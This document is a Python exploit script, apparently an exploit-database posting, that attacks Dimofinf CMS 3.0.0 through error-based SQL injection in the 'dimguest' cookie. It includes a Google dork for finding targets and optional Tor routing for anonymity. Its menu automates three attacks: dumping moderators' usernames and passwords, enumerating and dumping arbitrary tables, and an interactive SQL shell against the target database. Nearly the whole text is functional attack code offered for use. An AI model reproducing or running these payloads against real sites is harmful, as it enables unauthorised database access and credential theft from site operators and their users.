# Dimofinf CMS Automatic Cookie SQL Injection exploit # Google Dork: intext:"Powered by Dimofinf" # Date: 19/11/2015 # Author: D35m0nd142 # Software link: http://www.dimofinf.net # Version: 3.0.0 # Tested on: Dimofinf version 3.0.0 # Sometimes it happens that the vulnerability allow you to get moderators' username and password but not the list of tables and columns # or viceversa; So if one of them does not work, you could try the other one anyway. #!/usr/bin/python import socks import socket import requests import sys,os,time from random import randint check = "Duplicate entry '" tor_addr = "127.0.0.1" tor_port = 9150 agents = ["Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36", "IBM WebExplorer /v0.94","Mozilla/5.0 (Windows; U; Windows NT 6.1; x64; fr; rv:1.9.2.13) Gecko/20101203 Firebird/3.6.13", "Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"] rand = randint(0,9) url = "" headers = {'User-Agent':agents[rand%len(agents)]} def removeDot(s): return s[1:] def extract(out): start = 0 for x in range(0,len(out)-len(check)): beset = True for k in range(0,17): if(out[x+k] != check[k]): beset = False if(beset): start = x+17 break got = "" for x in range(start,len(out)): if(out[x] == '~'): break got += out[x] return got def req(cookies): global headers r = requests.get(url,cookies=cookie,headers=headers) out = r.text return out print "\n-----------------------------------------------------------" print "Dimofinf CMS v3.0.0 Automatic Cookie SQL Injection exploit" print "Author: D35m0nd142" print "-----------------------------------------------------------" url = raw_input("\nEnter URL -> ") if("http" not in url): url = "http://%s" %url tor = raw_input("Do you want to use TOR? (y/n) ") if(tor == "y" or tor == "Y" or tor == "yes"): try: socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, tor_addr, tor_port) socket.socket = socks.socksocket except requests.ConnectionError as e: print "[ERROR] Could not connect to TOR" sys.exit(1) session = requests.Session() response = session.get(url) s = str(session.cookies.get_dict()) if("dimguest" in s): i = 0 print "\n[+] 'dimguest' cookie found. Checking exploitability.." cookie = {'dimguest':'1\''} r = requests.get(url,cookies=cookie,headers=headers) choice = "nope" if("Database Error" in r.text and "Invalid SQL" in r.text and "You have an error in your SQL" in r.text): print "[+] Target seems to be exploitable (SQL error found)." cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select user()),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#'} out = req(cookie) current = extract(out) if(len(current) < 70): print "[+] Current User: %s" %(removeDot(current)) else: print "[+] Current User: ?" print "\n----------------------------------------" print " 1) Get moderators' usernames:passwords" print " 2) Browse DB (wizard)" print " 3) SQL shell (difficult)" print "----------------------------------------" choice = raw_input(" -> ") print "" if(choice == "1"): cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select Concat(username,0x3a,password) from moderators limit %s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#' %i} out = req(cookie) while(check in out): got = extract(out) if(len(got) > 0): print "[+] GOT: '%s'" %(removeDot(got)) i += 1 cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select Concat(username,0x3a,password) from moderators limit %s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#' %i} out = req(cookie) elif(choice == "2"): print "[*] Gathering tables..\n" cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select Concat(table_name) from information_schema.tables where table_schema=database() limit %s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#' %i} out = req(cookie) while(check in out): got = extract(out) if(len(got) > 0): print "[Table] '%s'" %(removeDot(got)) i += 1 cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select Concat(table_name) from information_schema.tables where table_schema=database() limit %s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#' %i} out = req(cookie) if(i == 0): print "[-] Any table found :(" tables = raw_input("\nEnter the tables (separated by ',') of which you want the columns -> ") mytables = [] tmp = "" for x in range(0,len(tables)): if(tables[x] == ',' or x == len(tables)-1): if(x == len(tables)-1): tmp += tables[x] mytables.append(tmp) tmp = "" else: tmp += tables[x] for table in mytables: col_check = [] k = 0 print "\n[+] Columns in '%s':\n" %table cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select Concat(column_name) from information_schema.columns where table_name=\'%s\' limit %s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#' %(table,k)} out = req(cookie) while(check in out): got = extract(out) if(got in col_check): break if(len(got) > 0): col_check.append(got) print " [Column] '%s'" %(removeDot(got)) k += 1 cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select Concat(column_name) from information_schema.columns where table_name=\'%s\' limit %s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#' %(table,k)} out = req(cookie) if(k == 0): print "[-] Any column found :(" dump = "nope" while(dump != "exit" and dump != "quit"): dump = raw_input("\nEnter the table and columns you want to dump (ex: table_name:column1,column2) -> ") if(dump == "exit" or dump == "quit"): break gotTable = False table = "" cols = [] col = "" for x in range(0,len(dump)): if(gotTable is False and dump[x] == ':'): gotTable = True x += 1 if(gotTable is False): table += dump[x] else: if(dump[x] == ',' or x == len(dump)-1): if(x == len(dump)-1): col += dump[x] cols.append(col) col = "" else: col += dump[x] if(len(cols) > 0): cols[0] = (cols[0])[1:] print cols print "\n[*] Dumping..\n" query = "1' and (select 1 from (select count(*),concat(0x3a,(select Concat(" for colu in cols: query += "%s,0x3a," %colu query = query[:-1] z = 0 query += ") from %s limit " %table while(True): snip = "%s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#" %z z += 1 myquery = query+snip cookie = {'dimguest':myquery} out = req(cookie) if(check not in out): break got = extract(out) print "[Dump]: '%s'" %(removeDot(got)) print "" elif(choice == "3"): print "[*] Opening SQL shell..\n" time.sleep(0.6) cmd = "" while(cmd != "exit" and cmd != "quit"): cmd = raw_input("SQL-shell> ") if(cmd == "exit" or cmd == "quit"): break cookie = {'dimguest':'1\' and (%s)#' %cmd} out = req(cookie) got = extract(out) print "qui" print "[+] GOT: '%s'\n" %(removeDot(got)) else: print "[INPUT ERROR] You entered a not valid choice!" sys.exit(1) if(i==0 and choice != "3"): print "[-] '%s' not vulnerable, or patched." %url else: print "\n[+] Target not vulnerable. (cookie 'dimguest' not found.)"